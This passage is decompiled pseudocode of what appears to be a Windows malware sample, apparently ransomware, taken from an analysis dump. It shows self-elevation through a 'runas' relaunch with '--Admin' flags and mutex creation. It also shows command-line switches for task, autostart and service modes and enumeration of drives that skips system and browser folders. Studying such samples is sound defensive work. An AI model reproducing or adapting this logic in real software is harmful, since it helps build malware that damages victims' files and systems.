												_t982 = _t982 + 1;
												__eflags = _t573;
											} while (_t573 != 0);
											_t983 = _t982 - _v12;
											__eflags = _t983;
										} else {
											_t983 = 0;
										}
										_push(_t983);
										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
										_t1202 = _t1202 + 1;
										__eflags = _t1202 - 0xa;
									} while (_t1202 < 0xa);
									__eflags = _a144 - 0x10;
									_t576 =  >=  ? _a124 :  &_a124;
									_push( >=  ? _a124 :  &_a124);
									 *(_t1230 + 0x8cc) = E00423C24();
									_a220 = 7;
									_a200 = 0;
									_a288 = 0;
									_a272.hwnd = 0;
									_a216 = 0;
									_a292 = 7;
									E00411CD0(_t949,  &_a272,  &_a200);
									_t581 = _a16;
									_t1268 = _t1266 + 8;
									_t950 = _a28;
									__eflags = _t581;
									if(_t581 != 0) {
										L59:
										 *(_t1230 + 0x8cc) = 0;
									} else {
										__eflags = _t950;
										if(_t950 != 0) {
											goto L59;
										} else {
											_a12 = 7;
											_push(0xffffffff);
											_v8 = 0;
											_a8 = 0;
											E00414690(_t950,  &_v8,  &_a200, 0);
											_t1294 = _t1268 - 0x18;
											_t1142 = _t1294;
											_push(0xffffffff);
											 *(_t1142 + 0x14) = 7;
											 *(_t1142 + 0x10) = 0;
											 *_t1142 = 0;
											E00414690(_t950, _t1142,  &_v20, 0);
											E0040D240( *(_t1230 + 0x8cc));
											_t1268 = _t1294 + 0x18;
											__eflags = _v12 - 8;
											if(_v12 >= 8) {
												L00422587(_v16);
												_t1268 = _t1268 + 4;
											}
											_t581 = _a8;
										}
									}
									__eflags =  *0x513235;
									if( *0x513235 != 0) {
										L60:
										E00411A10();
										goto L61;
									} else {
										__eflags = _t581;
										if(_t581 != 0) {
											L62:
											__eflags =  *0x513234;
											if(__eflags != 0) {
												goto L81;
											} else {
												__eflags = _t581;
												if(__eflags == 0) {
													__eflags = _t950;
													if(__eflags == 0) {
														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
														_t1245 = _v16;
														_t1268 = _t1268 + 4;
														_a108 = 0xf;
														_t1217 = 0;
														__eflags = 0;
														_a104.hwnd = 0;
														_a88 = _t950;
														do {
															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
															__eflags =  *_t1191;
															if( *_t1191 != 0) {
																_t1136 = _t1191;
																_t950 = _t1136 + 1;
																do {
																	_t859 =  *_t1136;
																	_t1136 = _t1136 + 1;
																	__eflags = _t859;
																} while (_t859 != 0);
																_t1137 = _t1136 - _t950;
																__eflags = _t1137;
															} else {
																_t1137 = 0;
															}
															_push(_t1137);
															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
															_t1217 = _t1217 + 1;
															__eflags = _t1217 - 0x10;
														} while (_t1217 < 0x10);
														_t861 =  &_a84;
														_t1140 =  &(_v24[0x8d0]);
														__eflags =  &(_v24[0x8d0]) - _t861;
														if( &(_v24[0x8d0]) != _t861) {
															_push(0xffffffff);
															E00413FF0(_t950, _t1140, _t861, 0);
														}
														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258);
														__eflags = _a100 - 0x10;
														 *0x513254 = _t865;
														if(__eflags >= 0) {
															L00422587(_a80);
															_t1268 = _t1268 + 4;
														}
													}
												}
												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
												_t1292 = _t1268 + 4;
												_t1244 = 0;
												__eflags = 0;
												do {
													_t846 = _v16;
													_a20 =  *(_t846 + _t1244 * 4);
													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
													E0042B420(_t950, 0, _t1215);
													_t1292 = _t1292 + 0x10;
													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
													lstrcatW(0x513290, _t950);
													_t1244 = _t1244 + 1;
													__eflags = _t1244 - 0xa;
												} while (_t1244 < 0xa);
												__eflags = lstrlenW(0x51a7c0);
												if(__eflags <= 0) {
													E0040E760(0x513278, __eflags);
													 *0x529225 = _a16;
													 *0x529226 = _a28;
													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c);
													 *0x513260 = _t856;
													WaitForSingleObject(_t856, 0xffffffff);
												}
												 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
											}
											goto L82;
										} else {
											__eflags = _t950;
											if(_t950 != 0) {
												goto L62;
											} else {
												__eflags =  *0x513234 - _t950;
												if(__eflags != 0) {
													L81:
													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
													L82:
													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
													_t1231 = _v16;
													_t1269 = _t1268 + 4;
													_a340 = 0xf;
													_t1204 = 0;
													__eflags = 0;
													_a336 = 0;
													_a320 = 0;
													do {
														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
														__eflags =  *_t1167;
														if( *_t1167 != 0) {
															_t986 = _t1167;
															_t950 = _t986 + 1;
															do {
																_t585 =  *_t986;
																_t986 = _t986 + 1;
																__eflags = _t585;
															} while (_t585 != 0);
															_t987 = _t986 - _t950;
															__eflags = _t987;
														} else {
															_t987 = 0;
														}
														_push(_t987);
														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
														_t1204 = _t1204 + 1;
														__eflags = _t1204 - 0xa;
													} while (_t1204 < 0xa);
													_t1270 = _t1269 - 0x18;
													_v20 = 0;
													_t1168 = _t1270;
													_t1205 =  &_v20;
													 *(_t1168 + 0x14) = 7;
													 *(_t1168 + 0x10) = 0;
													 *_t1168 = 0;
													__eflags =  *0x51a7c0;
													if( *0x51a7c0 != 0) {
														_t989 = 0x51a7c0;
														_t201 =  &(_t989[1]); // 0x51a7c2
														_t1231 = _t201;
														do {
															_t588 =  *_t989;
															_t989 =  &(_t989[1]);
															__eflags = _t588;
														} while (_t588 != 0);
														_t990 = _t989 - _t1231;
														__eflags = _t990;
														_t991 = _t990 >> 1;
													} else {
														_t991 = 0;
													}
													_push(_t991);
													E00415C10(0, _t1168, _t1205, _t1231, 0x51a7c0);
													_t590 = E00412840( &_v20, 0);
													_t1271 = _t1270 + 0x18;
													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
														_t590 =  *_t590;
													}
													E00410FC0(_t590, _t1205);
													__eflags = _a4 - 0x10;
													_t1232 = _v28;
													if(_a4 >= 0x10) {
														L00422587(_v16);
														_t1271 = _t1271 + 4;
													}
													_t592 = lstrlenA(_v24);
													__eflags = _t592 - 0x20;
													if(_t592 == 0x20) {
														_t1272 = _t1271 - 0x18;
														_t1171 = _t1272;
														_t952 = 0;
														 *(_t1171 + 0x14) = 7;
														 *(_t1171 + 0x10) = 0;
														 *_t1171 = 0;
														__eflags =  *0x51a7c0;
														if( *0x51a7c0 != 0) {
															_t995 = 0x51a7c0;
															_t210 =  &(_t995[1]); // 0x51a7c2
															_t1205 = _t210;
															do {
																_t594 =  *_t995;
																_t995 =  &(_t995[1]);
																__eflags = _t594;
															} while (_t594 != 0);
															_t996 = _t995 - _t1205;
															__eflags = _t996;
															_t997 = _t996 >> 1;
														} else {
															_t997 = 0;
														}
														_push(_t997);
														E00415C10(_t952, _t1171, _t1205, _t1232, 0x51a7c0);
														_t596 = E00412840( &_v24, _t952);
														_t1273 = _t1272 + 0x18;
														__eflags = _t596[0x14] - 0x10;
														if(_t596[0x14] >= 0x10) {
															_t596 =  *_t596;
														}
														lstrcpyA(_t1232 + 0x28, _t596);
														__eflags = _v0 - 0x10;
														if(_v0 >= 0x10) {
															L00422587(_v20);
															_t1273 = _t1273 + 4;
														}
														__eflags =  *0x521cf0;
														if( *0x521cf0 != 0) {
															_t1000 = 0x521cf0;
															_t216 =  &(_t1000[1]); // 0x521cf2
															_t1173 = _t216;
															do {
																_t599 =  *_t1000;
																_t1000 =  &(_t1000[1]);
																__eflags = _t599;
															} while (_t599 != 0);
															_t1001 = _t1000 - _t1173;
															__eflags = _t1001;
															_t1002 = _t1001 >> 1;
														} else {
															_t1002 = 0;
														}
														_push(_t1002);
														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
														_t1233 = _v36;
														_t1274 = _t1273 + 4;
														_a248 = 0xf;
														_t1206 = 0;
														__eflags = 0;
														_a244 = 0;
														_a228 = 0;
														do {
															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
															__eflags =  *_t1175;
															if( *_t1175 != 0) {
																_t1005 = _t1175;
																_t952 = _t1005 + 1;
																do {
																	_t602 =  *_t1005;
																	_t1005 = _t1005 + 1;
																	__eflags = _t602;
																} while (_t602 != 0);
																_t1006 = _t1005 - _t952;
																__eflags = _t1006;
															} else {
																_t1006 = 0;
															}
															_push(_t1006);
															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
															_t1206 = _t1206 + 1;
															__eflags = _t1206 - 0xa;
														} while (_t1206 < 0xa);
														_t1275 = _t1274 - 0x18;
														_t1008 = _t1275;
														_push(0xffffffff);
														 *(_t1008 + 0x14) = 0xf;
														 *(_t1008 + 0x10) = 0;
														 *_t1008 = 0;
														E00413FF0(0, _t1008,  &_a228, 0);
														_t1207 = E00412900( &_v40, 0);
														_t955 = _v52 + 0x828;
														_t1276 = _t1275 + 0x18;
														__eflags = _t955 - _t1207;
														if(_t955 != _t1207) {
															__eflags = _t955[5] - 8;
															if(_t955[5] >= 8) {
																L00422587( *_t955);
																_t1276 = _t1276 + 4;
															}
															_t955[5] = 7;
															_t955[4] = 0;
															 *_t955 = 0;
															__eflags = _t1207[5] - 8;
															if(_t1207[5] >= 8) {
																 *_t955 =  *_t1207;
																 *_t1207 = 0;
															} else {
																_t839 = _t1207[4] + 1;
																__eflags = _t839;
																if(_t839 != 0) {
																	E004205A0(_t955, _t1207, _t839 + _t839);
																	_t1276 = _t1276 + 0xc;
																}
															}
															_t955[4] = _t1207[4];
															_t955[5] = _t1207[5];
															__eflags = 0;
															_t1207[5] = 7;
															_t1207[4] = 0;
															 *_t1207 = 0;
														}
														__eflags = _v12 - 8;
														if(__eflags >= 0) {
															L00422587(_v32);
															_t1276 = _t1276 + 4;
														}
														E0040EF50(0x50fef0,  &_v40, __eflags, 0xa);
														_t1234 = _v40;
														_t1277 = _t1276 + 4;
														_a220 = 0xf;
														_t1208 = 0;
														__eflags = 0;
														_a216 = 0;
														_a200 = 0;
														do {
															_t1178 =  *((intOrPtr*)(_t1234 + _t1208 * 4));
															__eflags =  *_t1178;
															if( *_t1178 != 0) {
																_t1011 = _t1178;
																_t955 = _t1011 + 1;
																do {
																	_t608 =  *_t1011;
																	_t1011 = _t1011 + 1;
																	__eflags = _t608;
																} while (_t608 != 0);
																_t1012 = _t1011 - _t955;
																__eflags = _t1012;
															} else {
																_t1012 = 0;
															}
															_push(_t1012);
															E00413EA0(_t955,  &_a200, _t1208, _t1234, _t1178);
															_t1208 = _t1208 + 1;
															__eflags = _t1208 - 0xa;
														} while (_t1208 < 0xa);
														_t1278 = _t1277 - 0x18;
														_t1014 = _t1278;
														_push(0xffffffff);
														 *(_t1014 + 0x14) = 0xf;
														 *(_t1014 + 0x10) = 0;
														 *_t1014 = 0;
														E00413FF0(0, _t1014,  &_a196, 0);
														_t1209 = E00412900( &_v48, 0);
														_t958 = _v60 + 0x840;
														_t1279 = _t1278 + 0x18;
														__eflags = _t958 - _t1209;
														if(_t958 != _t1209) {
															__eflags = _t958[5] - 8;
															if(_t958[5] >= 8) {
																L00422587( *_t958);
																_t1279 = _t1279 + 4;
															}
															_t958[5] = 7;
															_t958[4] = 0;
															 *_t958 = 0;
															__eflags = _t1209[5] - 8;
															if(_t1209[5] >= 8) {
																 *_t958 =  *_t1209;
																 *_t1209 = 0;
															} else {
																_t828 = _t1209[4] + 1;
																__eflags = _t828;
																if(_t828 != 0) {
																	E004205A0(_t958, _t1209, _t828 + _t828);
																	_t1279 = _t1279 + 0xc;
																}
															}
															_t958[4] = _t1209[4];
															_t958[5] = _t1209[5];
															__eflags = 0;
															_t1209[5] = 7;
															_t1209[4] = 0;
															 *_t1209 = 0;
														}
														__eflags = _v20 - 8;
														if(__eflags >= 0) {
															L00422587(_v40);
															_t1279 = _t1279 + 4;
														}
														E0040EF50(0x50ff20,  &_v48, __eflags, 0xa);
														_t1235 = _v48;
														_t1280 = _t1279 + 4;
														_a284 = 0xf;
														_t1210 = 0;
														__eflags = 0;
														_a280 = 0;
														_a264 = 0;
														do {
															_t1181 =  *((intOrPtr*)(_t1235 + _t1210 * 4));
															__eflags =  *_t1181;
															if( *_t1181 != 0) {
																_t1017 = _t1181;
																_t958 = _t1017 + 1;
																do {
																	_t614 =  *_t1017;
																	_t1017 = _t1017 + 1;
																	__eflags = _t614;
																} while (_t614 != 0);
																_t1018 = _t1017 - _t958;
																__eflags = _t1018;
															} else {
																_t1018 = 0;
															}
															_push(_t1018);
															E00413EA0(_t958,  &_a264, _t1210, _t1235, _t1181);
															_t1210 = _t1210 + 1;
															__eflags = _t1210 - 0xa;
														} while (_t1210 < 0xa);
														_t1281 = _t1280 - 0x18;
														_t1020 = _t1281;
														_push(0xffffffff);
														 *(_t1020 + 0x14) = 0xf;
														 *(_t1020 + 0x10) = 0;
														 *_t1020 = 0;
														E00413FF0(0, _t1020,  &_a260, 0);
														_t618 = E00412900( &_v56, 0);
														_t1236 = _v68;
														_t1211 = _t618;
														_t1282 = _t1281 + 0x18;
														_t960 = _t1236 + 0x870;
														__eflags = _t960 - _t1211;
														if(_t960 != _t1211) {
															__eflags = _t960[5] - 8;
															if(_t960[5] >= 8) {
																L00422587( *_t960);
																_t1282 = _t1282 + 4;
															}
															_t960[5] = 7;
															_t960[4] = 0;
															 *_t960 = 0;
															__eflags = _t1211[5] - 8;
															if(_t1211[5] >= 8) {
																 *_t960 =  *_t1211;
																 *_t1211 = 0;
															} else {
																_t817 = _t1211[4] + 1;
																__eflags = _t817;
																if(_t817 != 0) {
																	E004205A0(_t960, _t1211, _t817 + _t817);
																	_t1282 = _t1282 + 0xc;
																}
															}
															_t960[4] = _t1211[4];
															_t960[5] = _t1211[5];
															__eflags = 0;
															_t1211[5] = 7;
															_t1211[4] = 0;
															 *_t1211 = 0;
														}
														__eflags = _v28 - 8;
														if(_v28 >= 8) {
															L00422587(_v48);
															_t1282 = _t1282 + 4;
														}
														_push(0xb);
														_v28 = 7;
														_v32 = 0;
														_v48 = 0;
														E00415C10(_t960,  &_v48, _t1211, _t1236, L"C:\\Windows\\");
														_t1237 = _t1236 + 0x888;
														E00413580(_t960, _t1236 + 0x888,  &_v56);
														__eflags = _v40 - 8;
														if(_v40 >= 8) {
															L00422587(_v52);
															_t1282 = _t1282 + 4;
														}
														_push(0x27);
														_v32 = 7;
														_v36 = 0;
														_v52 = 0;
														E00415C10(_t960,  &_v52, _t1211, _t1237, L"C:\\Program Files (x86)\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v60);
														__eflags = _v44 - 8;
														if(_v44 >= 8) {
															L00422587(_v56);
															_t1282 = _t1282 + 4;
														}
														_push(0x29);
														_v36 = 7;
														_v40 = 0;
														_v56 = 0;
														E00415C10(_t960,  &_v56, _t1211, _t1237, L"C:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v64);
														__eflags = _v48 - 8;
														if(_v48 >= 8) {
															L00422587(_v60);
															_t1282 = _t1282 + 4;
														}
														_push(0x1e);
														_v40 = 7;
														_v44 = 0;
														_v60 = 0;
														E00415C10(_t960,  &_v60, _t1211, _t1237, L"C:\\Program Files (x86)\\Google\\");
														E00413580(_t960, _t1237,  &_v68);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v64);
															_t1282 = _t1282 + 4;
														}
														_push(0x21);
														_v44 = 7;
														_v48 = 0;
														_v64 = 0;
														E00415C10(_t960,  &_v64, _t1211, _t1237, L"C:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v72);
														__eflags = _v56 - 8;
														if(_v56 >= 8) {
															L00422587(_v68);
															_t1282 = _t1282 + 4;
														}
														_push(0x23);
														_v48 = 7;
														_v52 = 0;
														_v68 = 0;
														E00415C10(_t960,  &_v68, _t1211, _t1237, L"C:\\Program Files\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v76);
														__eflags = _v60 - 8;
														if(_v60 >= 8) {
															L00422587(_v72);
															_t1282 = _t1282 + 4;
														}
														_push(0x18);
														_v52 = 7;
														_v56 = 0;
														_v72 = 0;
														E00415C10(_t960,  &_v72, _t1211, _t1237, L"C:\\Program Files\\Google\\");
														E00413580(_t960, _t1237,  &_v80);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v76);
															_t1282 = _t1282 + 4;
														}
														E00413100( &_v76, _t1211, L"D:\\Windows\\");
														_v52 = E00415200( &_v36);
														_t353 = E00415610(_t648) + 0x880; // 0x880
														E00413580(_t960, _t353,  &_v80);
														E00413210( &_v84);
														E00413100( &_v84, _t1211, L"D:\\Program Files (x86)\\Mozilla Firefox\\");
														_t1212 = E00413920( &_v44);
														_t358 = _t1212 + 0x880; // 0x880
														_t961 = _t358;
														E00413580(_t358, _t358,  &_v88);
														E00413210( &_v92);
														E00413100( &_v92, _t1212, L"D:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v96);
														E00413210( &_v100);
														E00413100( &_v100, _t1212, L"D:\\Program Files (x86)\\Google\\");
														E00413580(_t961, _t961,  &_v104);
														E00413210( &_v108);
														E00413100( &_v108, _t1212, L"D:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t961, _t961,  &_v112);
														E00413210( &_v116);
														E00413100( &_v116, _t1212, L"D:\\Program Files\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v120);
														E00413210( &_v124);
														E00413100( &_v124, _t1212, L"D:\\Program Files\\Google\\");
														E00413580(_t961, _t961,  &_v128);
														E00413210( &_v132);
														_t375 = _t1212 + 0x868; // 0x868
														_t1238 = _t375;
														_t677 = E00413490(_t375, 0);
														__eflags =  *_t677 - 0x2e;
														if( *_t677 != 0x2e) {
															_t800 = E0041CDD0( &_v76, _t1238);
															_t1282 = _t1282 + 4;
															E004131D0(_t1238, _t800);
															E00413210( &_v80);
														}
														E0041C140(E00413560( &_v76), _t961);
														E00413600( &_v80);
														E0040EF50(0x50ff50,  &_v92, __eflags, 0xa);
														_t1283 = _t1282 + 4;
														E00412C20( &_a300);
														_t962 = _v92;
														_t1239 = 0;
														do {
															E00412DE0(_t1212,  *((intOrPtr*)(_t962 + _t1239 * 4)));
															_t1239 = _t1239 + 1;
															__eflags = _t1239 - 0xa;
														} while (_t1239 < 0xa);
														_v8 = 0x100;
														GetUserNameW( &_a388,  &_v8);
														E00413930( &_v76);
														_t1284 = _t1283 - 0x18;
														E00412C40(_t1284, _t1212, "|");
														_t1285 = _t1284 - 0x18;
														E00412BF0(_t1285,  &_a300);
														E0040ECB0( &_v84);
														_t1286 = _t1285 + 0x30;
														_v100 =  *((intOrPtr*)(E0041C410( &_v84,  &_v96)));
														_t697 = E0041C450( &_v104, E0041C420( &_v88,  &_v96));
														__eflags = _t697;
														if(_t697 != 0) {
															do {
																_t782 = E00412F40(E0041C430( &_v88));
																_t1290 = _t1286 - 0x18;
																E00412C40(_t1290, _t1212, _t782);
																_t784 = E00412900( &_v8, 0);
																_t400 = _t1212 + 0x880; // 0x880
																E00413580(_t962, _t400, _t784);
																E00413210( &_v12);
																_t788 = E00413100( &_a96, _t1212,  &_a380);
																_t789 = E00413100( &_v16, _t1212, L"%username%");
																_t405 = _t1212 + 0x880; // 0x880
																_t1239 = _t789;
																_t790 = E00413660(_t405);
																_t406 = _t1212 + 0x880; // 0x880
																E0040F1F0(E004136A0(_t406, _t790 - 1), _t789, _t788);
																_t1286 = _t1290 + 0x1c;
																E00413210( &_v24);
																E00413210( &_a84);
																E0041C440( &_v108);
																_t799 = E0041C450( &_v112, E0041C420( &_v96,  &_v104));
																__eflags = _t799;
															} while (_t799 != 0);
														}
														_t414 = _t1212 + 0x880; // 0x880
														E004136C0(_t414,  &_a204);
														E0040CA70(_t962,  &_v36, _t1212, _t1239);
														_t416 = _t1212 + 0x850; // 0x850
														E004130B0(_t1286 - 0x18, _t416);
														E0040C740();
														E004111C0(E0041C2F0(), L"I:\\5d2860c89d774.jpg");
														E0041BA10(_a4);
														_t707 = E0041BA80(_a4);
														__eflags = _t707;
														if(_t707 != 0) {
															 *(_t1212 + 0x8c0) = 0;
															 *_t1212 =  *0x51323c;
															E00413560( &_v4);
															E00410A50( &_v4);
															E0041C140(E00413560( &_v32),  &_v4);
															E00413600( &_v36);
															E00413100( &_v36, _t1212, L"F:\\");
															E00413580(_t962,  &_v12,  &_v40);
															E00413210( &_v44);
															E00413640( &_v16,  &_v100);
															_t723 = E00413900( &_v108, E00413650( &_v20,  &_v48));
															__eflags = _t723;
															if(_t723 != 0) {
																_t966 = _v48;
																do {
																	E0041C330(_t1212, _t1239, E0041F110( &_v84));
																	E0041C240(_t1212, _t1239, E00419D10( &_a896));
																	L214();
																	_t770 = E0041C2F0();
																	 *(_t1212 + 0x8c0) =  *(_t1212 + 0x8c0) + 1;
																	_t1239 = _t770;
																	E0041B8B0(_t966, _t1239, _t966);
																	_t773 = E004134B0(E0041C470( &_v100));
																	_t441 = _t1239 + 0x8a4; // 0x8a4
																	E00413260(_t441, _t1212, _t773);
																	 *((char*)(_t1239 + 0x8e0)) = 1;
																	E0041FA10(E0041C3D0(), _t1239);
																	E004138D0( &_v108);
																	_t780 = E00413900( &_v112, E00413650( &_v24,  &_v52));
																	__eflags = _t780;
																} while (_t780 != 0);
															}
															 *0x529238 =  *0x51323c;
															E0041FDC0(0x529238);
															_t727 = GetMessageW( &_a272, 0, 0, 0);
															__eflags = _t727;
															if(_t727 != 0) {
																do {
																	TranslateMessage( &_a276);
																	DispatchMessageW( &_a276);
																	_t765 = GetMessageW( &_a276, 0, 0, 0);
																	__eflags = _t765;
																} while (_t765 != 0);
															}
															_t728 =  *0x513250;
															__eflags = _t728;
															if(_t728 != 0) {
																PostThreadMessageW(_t728, 0x12, 0, 0);
																do {
																	_t754 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t754;
																	if(_t754 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t759 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t759;
																		} while (_t759 != 0);
																	}
																	_t755 = WaitForSingleObject( *0x513240, 0xa);
																	__eflags = _t755 - 0x102;
																} while (_t755 == 0x102);
															}
															_t729 =  *0x51324c;
															__eflags = _t729;
															if(_t729 != 0) {
																PostThreadMessageW(_t729, 0x12, 0, 0);
																do {
																	_t746 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t746;
																	if(_t746 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t751 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t751;
																		} while (_t751 != 0);
																	}
																	_t747 = WaitForSingleObject( *0x513248, 0xa);
																	__eflags = _t747 - 0x102;
																} while (_t747 == 0x102);
															}
															__eflags =  *0x513234;
															_t730 =  *0x513230;
															if( *0x513234 == 0) {
																_t730 =  *0x513238;
															}
															__eflags = _t730;
															if(_t730 != 0) {
																CloseHandle(_t730);
															}
															_t1242 = _a284;
															E00413600( &_v4);
														} else {
															_t1242 = 0;
														}
														E004139D0( &_v76);
														E00412D50( &_a304);
														E00412D50( &_a228);
														E00412D50( &_a156);
														E00412D50( &_a180);
													} else {
														_t1242 = 0;
													}
													E00412D50( &_a252);
												} else {
													_t868 = GetVersion();
													__eflags = _t868 - 5;
													if(_t868 <= 5) {
														goto L60;
													} else {
														lstrcpyW( &_a968, L"--Admin");
														lstrcatW( &_a968, L" IsNotAutoStart");
														lstrcatW( &_a968, L" IsNotTask");
														E0042B420( &_a400, 0, 0x38);
														_a396.cbSize = 0x3c;
														_a412 =  &_a3248;
														_t1268 = _t1268 + 0xc;
														_a400 = 0;
														_a416 =  &_a968;
														_t879 = _t1230 + 0x10;
														__eflags =  *((intOrPtr*)(_t879 + 0x14)) - 8;
														if( *((intOrPtr*)(_t879 + 0x14)) >= 8) {
															_t879 =  *_t879;
														}
														_a420 = _t879;
														_a424 = 5;
														_a408 = L"runas";
														_t881 = ShellExecuteExW( &_a396);
														__eflags = _t881;
														if(_t881 == 0) {
															L61:
															_t581 = _a16;
															goto L62;
														} else {
															_t1242 = 0;
														}
													}
												}
											}
										}
									}
									E00413210( &_a204);
									E00413210( &_a132);
									E00412D50( &_a56);
									E00413B10( &_a44);
									return _t1242;
								} else {
									__eflags = 0;
									E00413B10( &_a116);
									return 0;
								}
							} else {
								_t1145 = _a28;
								_v12 = _t1145 + 0x14;
								_t968 = _t1145 + 0xc;
								_a24 = _t1145 + 0x10;
								while(1) {
									_t895 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t1145 + _t1201 * 4)), L"--Admin");
									_t1264 = _t1264 + 8;
									__eflags = _t895;
									_t896 = _a28;
									if(_t895 != 0) {
										goto L17;
									}
									__eflags = lstrcmpW(L"IsAutoStart",  *(_t896 + 4 + _t1201 * 4));
									_t1154 =  ==  ? 1 : _a20 & 0x000000ff;
									_a20 =  ==  ? 1 : _a20 & 0x000000ff;
									__eflags = lstrcmpW(L"IsTask",  *_t968);
									_t1157 =  ==  ? 1 : _a32 & 0x000000ff;
									 *0x513235 = 1;
									_t1201 = _t1201 + 2;
									_a24 =  &(_a24[2]);
									_t968 =  &(_t968[2]);
									_a32 =  ==  ? 1 : _a32 & 0x000000ff;
									_t923 =  &(_v12[2]);
									L25:
									_a24 =  &(_a24[1]);
									_t1201 = _t1201 + 1;
									_t968 =  &(_t968[1]);
									_v12 =  &(_t923[1]);
									__eflags = _t1201 - _a36;
									if(_t1201 < _a36) {
										_t1145 = _a28;
										continue;
									} else {
										goto L26;
									}
									goto L235;
									L17:
									_t897 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t896 + _t1201 * 4)), L"--ForNetRes");
									_t1264 = _t1264 + 8;
									__eflags = _t897;
									_t898 = _a28;
									if(_t897 != 0) {
										_t899 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t898 + _t1201 * 4)), L"--Task");
										_t1264 = _t1264 + 8;
										__eflags = _t899;
										if(_t899 != 0) {
											_t901 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--AutoStart");
											_t1264 = _t1264 + 8;
											__eflags = _t901;
											if(_t901 != 0) {
												_t903 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--Service");
												_t1264 = _t1264 + 8;
												__eflags = _t903;
												if(_t903 == 0) {
													_t969 = _a28;
													_t1248 = E00423C92( *((intOrPtr*)(_t969 + 4 + _t1201 * 4)));
													_a40 = _t1248;
													lstrcpyW(0x51a7c0,  *(_t969 + 8 + _t1201 * 4));
													lstrcpyW(0x521cf0,  *(_t969 + 0xc + _t1201 * 4));
													while(1) {
														_t1220 = OpenProcess(0x100000, 0, _t1248);
														__eflags = _t1220;
														if(_t1220 == 0) {
															break;
														}
														_t916 = WaitForSingleObject(_t1220, 0x1f4);
														_t917 = CloseHandle(_t1220);
														_t916 - 0x102 = _t917 & 0xffffff00 | _t916 == 0x00000102;
														if((_t917 & 0xffffff00 | _t916 == 0x00000102) == 0) {
															break;
														} else {
															_t919 = E00411AB0();
															__eflags = _t919;
															if(_t919 != 0) {
																GlobalFree(_t969);
																__eflags = 0;
																E00413B10( &_a116);
																return 0;
															} else {
																Sleep(1);
																_t1248 = _a40;
																continue;
															}
														}
														goto L235;
													}
													E00411CD0(_t969, 0, 0);
													 *0x529224 = 0;
													_t1249 = GetCurrentProcess();
													_a40 = 0;
													GetExitCodeProcess(_t1249,  &_a40);
													TerminateProcess(_t1249, _a40);
													CloseHandle(_t1249);
													__eflags = 0;
													E00413B10( &_a116);
													return 0; // executed
												} else {
													goto L24;
												}
											} else {
												_a20 = 1;
												goto L24;
											}
										} else {
											_a32 = 1;
											L24:
											_t923 = _v12;
											goto L25;
										}
									} else {
										 *0x513234 = 1;
										lstrcpyW(0x51a7c0,  *(_t898 + 4 + _t1201 * 4));
										lstrcpyW(0x521cf0,  *_t968);
										__eflags = lstrcmpW(L"IsAutoStart",  *_a24);
										_t1149 =  ==  ? 1 : _a20 & 0x000000ff;
										_a20 =  ==  ? 1 : _a20 & 0x000000ff;
										__eflags = lstrcmpW(L"IsTask",  *_v12);
										_t1151 =  ==  ? 1 : _a32 & 0x000000ff;
										_a24 =  &(_a24[4]);
										_t1201 = _t1201 + 4;
										_t968 =  &(_t968[4]);
										_a32 =  ==  ? 1 : _a32 & 0x000000ff;
										_t923 =  &(_v12[4]);
										goto L25;
									}
									goto L235;
								}
							}
						}
					}
				} else {
					E004124E0();
					return 0;
				}
				L235:
			}

0x00419f93
0x00419f9b
0x00419fa3
0x00419fa5
0x00419fa6
0x00419fab
0x00419fb2
0x00419fc4
0x00419fd2
0x00419fda
0x00419fe0
0x00419fe2
0x00419fe4
0x00419fe4
0x00419fe6
0x00419ff1
0x00419ff9
0x0041a005
0x0041a00a
0x0041a015
0x0041a017
0x0041a019
0x0041a01c
0x0041b669
0x0041b66e
0x00000000
0x0041a022
0x0041a02a
0x0041a030
0x0041a036
0x0041a038
0x0041a03d
0x0041a048
0x0041a04d
0x0041a058
0x0041a05a
0x0041a05c
0x0041a05f
0x0041b673
